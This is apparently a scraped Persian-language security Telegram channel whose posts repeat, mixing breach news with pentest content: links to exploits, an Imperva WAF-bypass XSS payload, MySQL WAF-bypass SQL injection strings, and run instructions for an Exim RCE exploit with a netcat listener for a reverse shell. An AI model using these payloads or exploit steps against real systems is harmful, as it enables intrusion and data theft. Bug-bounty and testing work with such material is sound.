جمع آوری زیردامنه های وبسایت با استفاده از ابزاری که از api وبسایت whoxy.com بهره میبرد
https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py
برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.
#web
#bugbounty
#subdomain
@sec_nerd
https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py
برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.
#web
#bugbounty
#subdomain
@sec_nerd
۱۷۹ گیگابایت از اطلاعات کارکنان ارتش امریکا بر روی یک سرور ابری آمازون بصورت محافظت نشده قرار داشت.
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.
https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/
#news
#breach
#usa
@sec_nerd
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.
https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/
#news
#breach
#usa
@sec_nerd
Security Boulevard
Sensitive US government and military travel details left exposed online
Significant amounts of sensitive data about employees of the US government military personnel data could now be in the public domain following its exposure in a data leak. Israeli security researchers Noam Rotem and Ran Locar discovered 179 GB of data on…
آسیب پذیری Cross Context Scripting(XCS) و نحوه اکسپلویت
https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation
#web
#XSS
#XCS
@sec_nerd
https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation
#web
#XSS
#XCS
@sec_nerd
www.slideshare.net
Cross Context Scripting attacks & exploitation
Cross Context Scripting (XCS) is a type of XSS (Cross Site Scripting) injection which occurs from an untrusted zone, typically a web page on the Internet into …
امنیت اطلاعات
آسیب پذیری Cross Context Scripting(XCS) و نحوه اکسپلویت https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation #web #XSS #XCS @sec_nerd
Maxthon - Cross Context Scripting (XCS) - about:history - Remote Code Execution
https://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html?m=1
#web
#XSS
#XCS
@sec_nerd
https://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html?m=1
#web
#XSS
#XCS
@sec_nerd
blog.malerisch.net
Maxthon - Cross Context Scripting (XCS) - about:history - Remote Code Execution
A blog about security research, web application security, software bugs and exploits.
ارسال بیش از ۵۰ هزار کاراکتر در پارامترهای POST
استفاده از مقادیری که عدد اویلر (e) دارند
#sqli
#bugbounty
#web
#pentest
@sec_nerd
استفاده از مقادیری که عدد اویلر (e) دارند
#sqli
#bugbounty
#web
#pentest
@sec_nerd
اطلاعات بیش از ۷ میلیون عضو سرویس ابری adobe بصورت محافظت نشده در دسترس عموم قرار داشت.
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.
در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.
اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
#breach
#adobe
#news
@sec_nerd
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.
در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.
اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
#breach
#adobe
#news
@sec_nerd
امنیت اطلاعات
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است https://bugs.php.net/bug.php?id=78599 و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند اکسپلویت: https://github.com/neex/phuip-fpizdam #php #nginx #rce @sec_nerd
"Once a vulnerable target has been identified, attackers can send specially crafted requests by appending '?a=' in the URL to a vulnerable web server."
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
#php
#nginx
#rce
@sec_nerd
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
#php
#nginx
#rce
@sec_nerd
imperva WAF bypass
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
#waf
#bugbounty
#imperva
@sec_nerd
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
#waf
#bugbounty
#imperva
@sec_nerd
وردلیست ۸ گیگابایتی مناسب برای کرک هش
https://gofile.io/?c=NHXEGm
حجم کمپرس شده 2.7 گیگ
#hash
#crack
@sec_nerd
https://gofile.io/?c=NHXEGm
حجم کمپرس شده 2.7 گیگ
#hash
#crack
@sec_nerd
exploit.py
2.2 KB
انتشار اکسپلویت اجرای دستور از راه دور بر روی سرویس exim با شناسه CVE-2019-10149
نسخه های آسیب پذیر: از 4.87 تا 4.91
کارکرد:
روی سرور مهاجم netcat به این صورت:
nc -lvp 9000
و اجرای اسکریپت:
python ./exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
https://github.com/Diefunction/CVE-2019-10149
#exim
#rce
#exploit
@sec_nerd
نسخه های آسیب پذیر: از 4.87 تا 4.91
کارکرد:
روی سرور مهاجم netcat به این صورت:
nc -lvp 9000
و اجرای اسکریپت:
python ./exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
https://github.com/Diefunction/CVE-2019-10149
#exim
#rce
#exploit
@sec_nerd
👍1
۵ روز پیش سرویس ابری آمازون هدف حملات گسترده DDOS از سوی عوامل ناشناخته قرار گرفت.
این حملات باعث از کار افتادن قسمتی از سرویس های آمازون به مدت ۸ ساعت شد. از جمله این سرویس ها میتوان به S3 و RDS و SQS و CloudFront و نیز EC2 و ELB اشاره کرد.
از جمله شرکتهایی که از این خدمات بهره میبرند DigitalOcean است که در طی این حمله دچار مشکل شد.
ناتوانی آمازون در جلوگیری از این حمله آن هم به مدت ۸ ساعت در حالی اتفاق افتاد که این شرکت در سرویس های خود Shield Advanced را دارد که با پلن های مختلف مدعی ایجاد امنیت در برابر حملات DDOS است.
منبع:
https://www.hackread.com/aws-ddos-attacks-lasted-8-hours/
#news
#amazon
#ddos
@sec_nerd
این حملات باعث از کار افتادن قسمتی از سرویس های آمازون به مدت ۸ ساعت شد. از جمله این سرویس ها میتوان به S3 و RDS و SQS و CloudFront و نیز EC2 و ELB اشاره کرد.
از جمله شرکتهایی که از این خدمات بهره میبرند DigitalOcean است که در طی این حمله دچار مشکل شد.
ناتوانی آمازون در جلوگیری از این حمله آن هم به مدت ۸ ساعت در حالی اتفاق افتاد که این شرکت در سرویس های خود Shield Advanced را دارد که با پلن های مختلف مدعی ایجاد امنیت در برابر حملات DDOS است.
منبع:
https://www.hackread.com/aws-ddos-attacks-lasted-8-hours/
#news
#amazon
#ddos
@sec_nerd
HackRead
AWS hit by massive DDoS attacks that lasted 8 hours
Like us on Facebook @ /HackRead
امنیت اطلاعات
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است https://bugs.php.net/bug.php?id=78599 و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند اکسپلویت: https://github.com/neex/phuip-fpizdam #php #nginx #rce @sec_nerd
داکر مخصوص آسیب پذیری php-fpm و nginx برای آزمایش آسیب پذیری RCE با شناسه CVE-2019-11043
https://github.com/akamajoris/CVE-2019-11043-Docker
#php
#nginx
#rce
#docker
@sec_nerd
https://github.com/akamajoris/CVE-2019-11043-Docker
#php
#nginx
#rce
#docker
@sec_nerd
GitHub
GitHub - akamajoris/CVE-2019-11043-Docker
Contribute to akamajoris/CVE-2019-11043-Docker development by creating an account on GitHub.
امنیت اطلاعات
PoC CVE-2019-11043 https://github.com/theMiddleBlue/CVE-2019-11043 #php #nginx #rce @sec_nerd
آنالیز فنی آسیب پذیری php-fpm و nginx توسط orange tsai
https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html
#php
#nginx
#rce
@sec_nerd
https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html
#php
#nginx
#rce
@sec_nerd
Orange Tsai
An analysis and thought about recently PHP-FPM RCE (CVE-2019-11043)
First of all, this is such a really interesting bug! From a small memory defect to code execution. It combines both binary and web technique so that’s why it interested me to trace into. This is just
راهکارهای پیدا کردن آی پی واقعی وبسایتهایی که از Cloudflare استفاده میکنند + ۲ ابزار برای این کار
https://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/
ابزارها:
https://github.com/m0rtem/CloudFail
https://github.com/greycatz/CloudUnflare
#web
#pentest
#Cloudflare
@sec_nerd
https://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/
ابزارها:
https://github.com/m0rtem/CloudFail
https://github.com/greycatz/CloudUnflare
#web
#pentest
#Cloudflare
@sec_nerd
Some MySQL tricks to break some #WAFs out there.
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#SQLi #bypass #bugbountytip
@sec_nerd
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#SQLi #bypass #bugbountytip
@sec_nerd